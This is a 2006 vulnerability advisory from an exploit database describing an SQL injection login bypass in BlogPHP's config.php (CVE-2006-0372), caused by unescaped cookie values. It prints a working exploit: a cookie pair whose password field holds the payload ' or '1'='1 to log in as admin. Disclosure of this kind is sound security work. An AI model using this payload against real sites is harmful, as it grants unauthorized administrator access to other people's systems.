Bug: BlogPHP config.php SQL injection login bypass (WLB-2006010052 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: BlogPHP config.php SQL injection login bypass
 Credit: imei
 Date: 2006.01.21
 CWE: CWE-89 (Show similar)
 CVE: CVE-2006-0372 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Medium
No
Yes

--------------------Summary----------------

Software: BlogPHP
Sowtware's Web Site: http://www.blogphp.net/
Versions: 1(2)
Type: SQL Injection
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: imei
-----------------Description---------------
Vulnerable scripts (as include):
config.php

Variable $_COOKIE[blogphp_username]and $_COOKIE[blogphp_password] never addslashed and have potential for SQL inject

--------------Exploit----------------------
send a cookie:
blogphp_username=admin
blogphp_password=imei' or '1'='1
--------------Solution---------------------
No Patch available.

--------------Credit-----------------------
Discovered by: imei
contact : addmimistrator (at) gmail (dot) com [email concealed]

(why i must send it more than one time?)

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com